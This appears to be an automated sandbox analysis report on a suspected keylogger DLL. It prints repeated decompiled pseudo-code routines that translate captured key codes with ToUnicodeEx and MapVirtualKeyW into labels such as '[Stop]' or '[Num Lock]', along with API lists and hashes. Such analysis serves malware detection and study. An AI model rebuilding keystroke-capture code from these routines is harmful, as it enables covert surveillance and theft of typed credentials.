                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Play / Pause]
                  • API String ID: 783433895-1618082066
                  • Opcode ID: 574edec8092f91f95576e93fb39d4c139960eca42ee1905eafac8136fd6412dc
                  • Instruction ID: 996c3445bb2b0b98ef0d408312881446d9d9f055120b4c6d947ec6de027f53a4
                  • Opcode Fuzzy Hash: 574edec8092f91f95576e93fb39d4c139960eca42ee1905eafac8136fd6412dc
                  • Instruction Fuzzy Hash: 6631C2B8F042545BF722D7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100075DA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Previous Track]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Previous Track]
                  • API String ID: 783433895-3210990766
                  • Opcode ID: ae1fa225a0918d02fcfd180ec664d208efe1b38483678a19622561ea0e0a9972
                  • Instruction ID: 497027ec4e24f1f338977bd459717c223580bce7c7b0098a339831e971cc0eb2
                  • Opcode Fuzzy Hash: ae1fa225a0918d02fcfd180ec664d208efe1b38483678a19622561ea0e0a9972
                  • Instruction Fuzzy Hash: E131C2B8F042545BF722C7658C45B9F73A9FB892C0F50C0A5F5489724ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100075EB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Stop]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Stop]
                  • API String ID: 783433895-3279900245
                  • Opcode ID: 57c83d590c1141da6764717a6adadb01255764739223c7300deac7d1602d8fdb
                  • Instruction ID: 5922670b37668e1b016a45364b7f0f1fd26dfdd2ab1d479554ab01751d872b69
                  • Opcode Fuzzy Hash: 57c83d590c1141da6764717a6adadb01255764739223c7300deac7d1602d8fdb
                  • Instruction Fuzzy Hash: 3531BEB8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100075FC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Mode Change]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Mode Change]
                  • API String ID: 783433895-697438833
                  • Opcode ID: 951490631784bd0ba326a047b941ed8099158b17901292eede5ad9bfe8389a96
                  • Instruction ID: fde19adec7dbaa11acaab95407c7a091db194ab80798eb66de65d17821cfaf80
                  • Opcode Fuzzy Hash: 951490631784bd0ba326a047b941ed8099158b17901292eede5ad9bfe8389a96
                  • Instruction Fuzzy Hash: E631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000760D(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Page Down]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Page Down]
                  • API String ID: 783433895-3750966751
                  • Opcode ID: 90d8874289e11761f89f11684cbec7ed874ee66b227f605c1b29b6e1100aa61f
                  • Instruction ID: 2fd29d5386bce6dd60f48b13cf1f1d6e541de4379b2d15e3869f5661c23656ba
                  • Opcode Fuzzy Hash: 90d8874289e11761f89f11684cbec7ed874ee66b227f605c1b29b6e1100aa61f
                  • Instruction Fuzzy Hash: CC31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000761E(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Num Lock]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Num Lock]
                  • API String ID: 783433895-3773462824
                  • Opcode ID: 1422f95064fd9bc28c63e91cd01088c80977b6f7f954c3e9b92471192964d997
                  • Instruction ID: b38ecb3cb3baf4de96862ef28da595c431d1415fe82338e8afeba86307a38cc0
                  • Opcode Fuzzy Hash: 1422f95064fd9bc28c63e91cd01088c80977b6f7f954c3e9b92471192964d997
                  • Instruction Fuzzy Hash: 1431C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000762F(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Pause]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
